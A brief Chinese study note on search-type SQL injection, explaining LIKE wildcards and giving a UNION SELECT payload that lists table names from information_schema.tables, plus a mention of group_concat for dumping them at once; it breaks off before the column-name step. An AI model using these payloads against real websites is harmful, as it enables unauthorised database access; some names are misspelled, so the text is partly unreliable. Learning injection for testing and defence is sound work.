搜索型注入,这是个什么东西,一起来看看
% 通配符
%key 可以匹配到okkey iskey
key% 可以匹配到keyok keyii
%key% 全能选手~
information_schme 里面的tables表中存放着库名对应表名
Select * from users where title =’33%(这里要找一个不存在的,否则后面显示不出来)’ union select 1,table_name,3 from information_schema.tables(库中的表名 ) where table_schema=’pet’(* 限定是我们指定查询的库中的表) and table_name<>’admin’(如果第一个显示了admin,想要继续查询接下来的表就要让这个东西不等于admin*)–
原来使用group_contact函数就可以不用一个一个尝试了一下子就可以显示出来了
上面是通过mysql大于5.0版本中的information_scheme库中的table表查出表名
接下来查询列名